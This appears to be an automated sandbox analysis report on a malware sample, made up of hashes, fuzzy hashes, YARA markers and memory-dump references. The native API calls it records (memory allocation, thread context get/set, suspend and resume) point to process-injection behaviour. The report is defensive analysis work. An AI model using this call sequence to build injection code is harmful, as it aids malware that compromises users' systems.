                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: 6ddc72b4f6202b06c465cb983a14ae959c414f6f1ea6b32d7fb0a6438048add9
                                                                                                                        • Instruction ID: d6619ef8149ede43c601ef0414cd975a016ba1077e4db4a125d4735272169ad1
                                                                                                                        • Opcode Fuzzy Hash: 6ddc72b4f6202b06c465cb983a14ae959c414f6f1ea6b32d7fb0a6438048add9
                                                                                                                        • Instruction Fuzzy Hash: 947130B1E04158DFCB04CFA9D890AEEBBF5AF4D304F18816AE459B7341D735A941CB98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040B90D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2167126740-0
                                                                                                                        • Opcode ID: 4a9d6b48f57e06537870ffc1ea9537e0d0a9dcc2f8f95f052032ee23512d9848
                                                                                                                        • Instruction ID: c2bc70c67c96ebf08775754c961f24cd964934424d3d7cdecbfbf4049ab5f95d
                                                                                                                        • Opcode Fuzzy Hash: 4a9d6b48f57e06537870ffc1ea9537e0d0a9dcc2f8f95f052032ee23512d9848
                                                                                                                        • Instruction Fuzzy Hash: 5B713CB1E04158DFCB04CFA9D490AEDBBF5AF89304F18806AE459B7351D738A942CF98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtGetContextThread.NTDLL(?,?), ref: 0040A1AD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1591575202-0
                                                                                                                        • Opcode ID: 7d74f337bfdbeb07ddfae0daa25d4316be1a32a843e8d25cbcf3dc9f1dcac047
                                                                                                                        • Instruction ID: 569fe0476a0aaca3de4d5581861cfc3fd9c06305b11eb610b2df8ad8e3e41c8d
                                                                                                                        • Opcode Fuzzy Hash: 7d74f337bfdbeb07ddfae0daa25d4316be1a32a843e8d25cbcf3dc9f1dcac047
                                                                                                                        • Instruction Fuzzy Hash: E97162B1E04258DFCB04CFA9C490AEDBBF1BF89314F1881AAE455BB381D638A951CF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtSetContextThread.NTDLL(?,?), ref: 0040A3BD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1591575202-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtDelayExecution.NTDLL(000000CA,?,?,?,00000000), ref: 0040B4DE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DelayExecution
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1249177460-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtResumeThread.NTDLL(000000CA,?,?,?,?), ref: 0040A5CD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ResumeThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 947044025-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • NtSuspendThread.NTDLL(?,?), ref: 00409F9D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: SuspendThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3178671153-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00417415
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtClose.NTDLL(0041A5B8,?,?,00000000,?,0041A5B8,?,?,?,?,?,?,?,?,00000000,?), ref: 004283E7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3535843008-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 0-2078129318
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(281B196J,00000111), ref: 00413C3A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 1836367815-2078129318
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 93 413bc3-413c00 call 42a263 call 42ac73 call 4173a3 100 413c07-413c2d call 423da3 93->100 101 413c02 call 4048a3 93->101 105 413c4d-413c53 100->105 106 413c2f-413c3e PostThreadMessageW 100->106 101->100 106->105 107 413c40-413c4a 106->107 107->105
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(281B196J,00000111), ref: 00413C3A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 1836367815-2078129318
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00419990,?,?,00419990,?,?,?,00419990,?,00002000), ref: 004286A2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00412285,?,00412285,?,00000000,00412285,?,00412285,?,?), ref: 004286EF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3298025750-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(?,00000000,?,?,C9A01013,?,?,C9A01013), ref: 00428737
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B92DF0: LdrInitializeThunk.NTDLL ref: 00B92DFA
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B90BA3
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B90BB6
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B90D60
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B90D74
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1404860816-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4cde866a0c5b53c1e5692108ad1d60f219ea7e95f138cdfb9f933ae7b24d4f26
                                                                                                                        • Instruction ID: 7f8216f2b8e71bf43499e717ae00d45580fc9aa0ffce9b3ba7c8ad7d7788e4a4
                                                                                                                        • Opcode Fuzzy Hash: 4cde866a0c5b53c1e5692108ad1d60f219ea7e95f138cdfb9f933ae7b24d4f26
                                                                                                                        • Instruction Fuzzy Hash: 46900272B0940802D25071988414746004587D1301F55C062A0024695D8B558B5576A1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a328d45c79f4f8f2ea57953351bb306ef9ad1544106fd5191dbaecedba8031ec
                                                                                                                        • Instruction ID: c6a86a759f9fe332a1d92940e694bb7e69a8f6f8c46f8040272be254814ada31
                                                                                                                        • Opcode Fuzzy Hash: a328d45c79f4f8f2ea57953351bb306ef9ad1544106fd5191dbaecedba8031ec
                                                                                                                        • Instruction Fuzzy Hash: A390027270540802D20471988804686004587D1301F55C062A6024696E9A6589917131
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 90bc0a4cfa6ad462d31e9f2d1200f00759b03d3e1f03b1260c090e898c65ee16
                                                                                                                        • Instruction ID: 958546dda91ec96c1eae73d2422c7fc42732dc41d129e773552af6a2317ecc21
                                                                                                                        • Opcode Fuzzy Hash: 90bc0a4cfa6ad462d31e9f2d1200f00759b03d3e1f03b1260c090e898c65ee16
                                                                                                                        • Instruction Fuzzy Hash: 0190027270540802D2807198840464A004587D2301F95C066A0025695DCE158B5977A1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 22f78ce50b5d979724d778f5f26d63b3b589341fc8ab299508a5b1d6ee202781
                                                                                                                        • Instruction ID: 9fb52d596d54677947035b5f766ef123e28f541c716b6941a0d72963b0b2fcf4
                                                                                                                        • Opcode Fuzzy Hash: 22f78ce50b5d979724d778f5f26d63b3b589341fc8ab299508a5b1d6ee202781
                                                                                                                        • Instruction Fuzzy Hash: AA90027270944842D24071988404A46005587D1305F55C062A00646D5D9A258E55B661
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fcfb2978dc2494776c85a92d4479be6577fb6f0e6359af9760fd51f0b723b16b
                                                                                                                        • Instruction ID: 0cb8b4c136662a93366b13d1ba7f65eb31727952e3b82cea990467209016d15e
                                                                                                                        • Opcode Fuzzy Hash: fcfb2978dc2494776c85a92d4479be6577fb6f0e6359af9760fd51f0b723b16b
                                                                                                                        • Instruction Fuzzy Hash: 7C90027270540402D20075D89408646004587E1301F55D062A5024596ECA6589916131
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1fe8a6c4ac4e1636a79c657609ddcdc93ccf54cf5e3def33e181ab37dc0e9242
                                                                                                                        • Instruction ID: a386cd75bf6615eca7158702320f3099a2daff08206f1675758ce5f047965993
                                                                                                                        • Opcode Fuzzy Hash: 1fe8a6c4ac4e1636a79c657609ddcdc93ccf54cf5e3def33e181ab37dc0e9242
                                                                                                                        • Instruction Fuzzy Hash: C090027270540403D20071989508707004587D1301F55D462A0424599DDA5689516121
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2a4718d91fcaf90372132b766560c9f30846275f9f247ed011b9b6a72ceb27ff
                                                                                                                        • Instruction ID: 2189ccbb1829e049d9fdab87467651c4dc5d75efcf3dfaceec486400c73cf053
                                                                                                                        • Opcode Fuzzy Hash: 2a4718d91fcaf90372132b766560c9f30846275f9f247ed011b9b6a72ceb27ff
                                                                                                                        • Instruction Fuzzy Hash: 45900262B0940402D24071989418706005587D1301F55D062A0024595DCA598B5566A1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fcec9160cb501ea5f50815802e84235ed5fec5a834ca6ba6581d068030af1e52
                                                                                                                        • Instruction ID: e3c4176df7ad8af26c1d5af6e8e56e13c997378d93856b561b6ac3da4a8087fa
                                                                                                                        • Opcode Fuzzy Hash: fcec9160cb501ea5f50815802e84235ed5fec5a834ca6ba6581d068030af1e52
                                                                                                                        • Instruction Fuzzy Hash: 2B90027270540842D20071988404B46004587E1301F55C067A0124695D8A15C9517521
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 87446ea4e2e7a4515ca8bbef35d5a060363786f37371c0363013e08affd34660
                                                                                                                        • Instruction ID: d4ae313b718a08e4f6a13a00210f572e16c04c8d8c9cf7b8a56779500cf8a441
                                                                                                                        • Opcode Fuzzy Hash: 87446ea4e2e7a4515ca8bbef35d5a060363786f37371c0363013e08affd34660
                                                                                                                        • Instruction Fuzzy Hash: 5190027274540402D24171988404606004997D1341F95C063A0424595E8A558B56AA61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d2402f26f8b9356c1529461534b7fdc60bd2b42587e7188ba01dcf7b2e654b82
                                                                                                                        • Instruction ID: 80a7eb81b43b2f53c77aa4609a94c73e5e2369d8b89faad1e540cde7c79f9455
                                                                                                                        • Opcode Fuzzy Hash: d2402f26f8b9356c1529461534b7fdc60bd2b42587e7188ba01dcf7b2e654b82
                                                                                                                        • Instruction Fuzzy Hash: A0900262746441525645B1988404507404697E1341795C063A1414991C89269956D621
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8d8b55a8acfe5b51057a2e88b0383819588e7c2caaef64dc90ba9f3dcfea1b99
                                                                                                                        • Instruction ID: 6af6c489016ce6c69881ca9a653cbec0f83c58f378faf97c5187eaf981541f16
                                                                                                                        • Opcode Fuzzy Hash: 8d8b55a8acfe5b51057a2e88b0383819588e7c2caaef64dc90ba9f3dcfea1b99
                                                                                                                        • Instruction Fuzzy Hash: 8990026270540003D240719894186064045D7E2301F55D062E0414595CDD1589565222
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6f5c50bdda68d248fdbcce94921d3f6482097fe8f133b51251db19e716a360d9
                                                                                                                        • Instruction ID: 8bb23f8de925de2389caf363c4e4adbfb89df07377e3334d8256756a42b3f527
                                                                                                                        • Opcode Fuzzy Hash: 6f5c50bdda68d248fdbcce94921d3f6482097fe8f133b51251db19e716a360d9
                                                                                                                        • Instruction Fuzzy Hash: 4090026A71740002D2807198940860A004587D2302F95D466A0015599CCD1589695321
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f26ec19599ae63727ef5b1a545c90841f0813ba560a8ce3148be4d2963dea229
                                                                                                                        • Instruction ID: bda744a3d180dd4786a131e9e56289b17ebad8a74e5606e0aced2d38d10a3374
                                                                                                                        • Opcode Fuzzy Hash: f26ec19599ae63727ef5b1a545c90841f0813ba560a8ce3148be4d2963dea229
                                                                                                                        • Instruction Fuzzy Hash: 1C90026270944442D20075989408A06004587D1305F55D062A10645D6DCA358951A131
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
